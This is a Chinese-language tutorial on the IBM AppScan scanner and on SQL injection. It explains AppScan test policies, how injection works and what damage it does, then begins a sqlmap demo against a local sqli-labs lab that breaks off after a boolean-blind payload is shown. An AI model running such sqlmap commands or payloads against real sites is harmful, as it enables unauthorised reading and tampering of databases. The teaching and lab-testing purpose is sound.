AppScan概述
它是由IBM公司开发的一款在Web应用程序渗透测试舞台上使用最广泛的工具,有助于专业安全人员进行Web应用程序自动化脆弱性评估
AppScan 8.0版本 中文 开源 免费
- Win10安装需要先安装NET+Framework+3.5
- 可以用虚拟机WIN7安装
AppScan渗透测试
- 选择一种测试策略
- 缺省值:包含多有测试,但不包含侵入式和端口侦听器
- 仅应用程序:包含所有应用程序级别的测试,但不包含侵入式和端口侦听器
- 仅基础结构:包含所有基础结构级别的测试,但不包含侵入式和端口贞听器
- 侵入式:包含所有侵入式测试(可能影响服务器稳定性的测试)
- 完成:包含所有的AppScan测试 @关键的少数:包含一些成功可能性较高的测试精选,在时间有限时对站点评估可能有用
- 开发者精要:包含一些成功可能性极高的应用程序测试的精选,在时间有限时对站点评估可能
SQL注入
SQL注入原理
假设我们在浏览器中输入www.sample.com ,由于它只是对页面的简单请求无需对数据库动进行动态请求,所以它不存在SQL注入
当我们输入www.sample.com?testid=23时,我们在URL中传递变量testid ,并且提供值为23 ,由于它是对数据库行动态查询的请求(其中?testid=23表示数据库查询变量) ,所以我们可以该URL中嵌入恶意SQL语句
程序没有对用户输入数据的合法性进行判断,使黑客可以绕 ,过应用程序限制,构造一段SQL语句并传递到数据库中,实现对数据库的操作
SQL注入的危害
- 数据库信息收集
- 操作数据库
- 增加数据
- 删除数据
- 更改数据
- 操作系统
- 借助数据库的内置功能操作系统
SQL 注入演示
搭建SQL注入平台
测试
获取数据库
获取用户
破解密码
具体过程
root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1
___
__H__
___ ___[(]_____ ___ ___ {1.1.12#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[!]法律免责声明:未经事先同意,使用sqlmap攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发人员不承担任何责任,也不对本程序造成的任何误用或损坏负责。
[*] starting at 16:04:24
[16:04:24] [INFO] resuming back-end DBMS 'mysql'
[16:04:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6790=6790 AND 'NFLR'='NFLR